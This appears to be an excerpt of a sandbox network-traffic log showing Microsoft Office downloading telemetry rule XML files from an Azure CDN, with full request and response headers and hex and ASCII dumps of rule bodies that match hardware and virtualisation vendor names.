                                                                                                                          2024-10-13 16:21:43 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          78192.168.2.44984413.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:43 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:43 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:43 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 408
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                          ETag: "0x8DC582BB9B6040B"
                                                                                                                          x-ms-request-id: fe1a2dd9-a01e-0053-57d8-1a8603000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162143Z-17db6f7c8cfqxt4wrzg7st2fm8000000058g0000000071qe
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:43 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          79192.168.2.44984513.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:43 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:43 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:43 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 469
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                          ETag: "0x8DC582BB3CAEBB8"
                                                                                                                          x-ms-request-id: 87870bf5-e01e-0003-2985-1d0fa8000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162143Z-17db6f7c8cfgqlr45m385mnngs00000003k000000000g2r9
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:43 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          80192.168.2.44984113.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:43 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:43 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:43 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 502
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                          ETag: "0x8DC582BB6A0D312"
                                                                                                                          x-ms-request-id: 6ee6cdcb-a01e-006f-4687-1b13cd000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162143Z-17db6f7c8cfq2j6f03aq9y8dns00000004d00000000032hb
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:43 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          81192.168.2.44984613.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:44 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:44 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:44 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 416
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                          ETag: "0x8DC582BB5284CCE"
                                                                                                                          x-ms-request-id: 9542a535-401e-0064-601f-1b54af000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162144Z-17db6f7c8cfqkqk8bn4ck6f72000000004w000000000afz6
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:44 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          82192.168.2.44984713.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:44 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:44 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:44 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 472
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                          ETag: "0x8DC582B91EAD002"
                                                                                                                          x-ms-request-id: fdc7e0a4-c01e-0034-181f-1b2af6000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162144Z-17db6f7c8cf96l6t7bwyfgbkhw000000044g000000008egz
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:44 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          83192.168.2.44985013.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:44 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:44 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:44 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 427
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                          ETag: "0x8DC582BB464F255"
                                                                                                                          x-ms-request-id: b5702fc7-501e-0047-59e6-1ace6c000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162144Z-17db6f7c8cfhrxld7punfw920n00000003y00000000043ga
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:44 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          84192.168.2.44984913.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:44 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:44 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:44 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 475
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                          ETag: "0x8DC582BBA740822"
                                                                                                                          x-ms-request-id: 69457385-001e-0034-42de-1add04000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162144Z-17db6f7c8cfp6mfve0htepzbps00000004m0000000005776
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:44 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          85192.168.2.44984813.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:44 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:44 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:44 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 432
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                          ETag: "0x8DC582BAABA2A10"
                                                                                                                          x-ms-request-id: 581fb33a-501e-00a0-339b-1b9d9f000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162144Z-17db6f7c8cfqkqk8bn4ck6f72000000004y000000000614k
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:44 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          86192.168.2.44985413.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:45 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:45 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:45 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 405
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                          ETag: "0x8DC582B942B6AFF"
                                                                                                                          x-ms-request-id: 103aeaae-201e-0051-661c-1c7340000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162145Z-17db6f7c8cfpm9w8b1ybgtytds00000002z000000000evs1
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:45 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          87192.168.2.44985113.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:45 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:45 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:45 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 474
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                          ETag: "0x8DC582BA4037B0D"
                                                                                                                          x-ms-request-id: eb876971-601e-0001-084f-1cfaeb000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162145Z-17db6f7c8cfcrfgzd01a8emnyg00000002k000000000cwv2
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:45 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
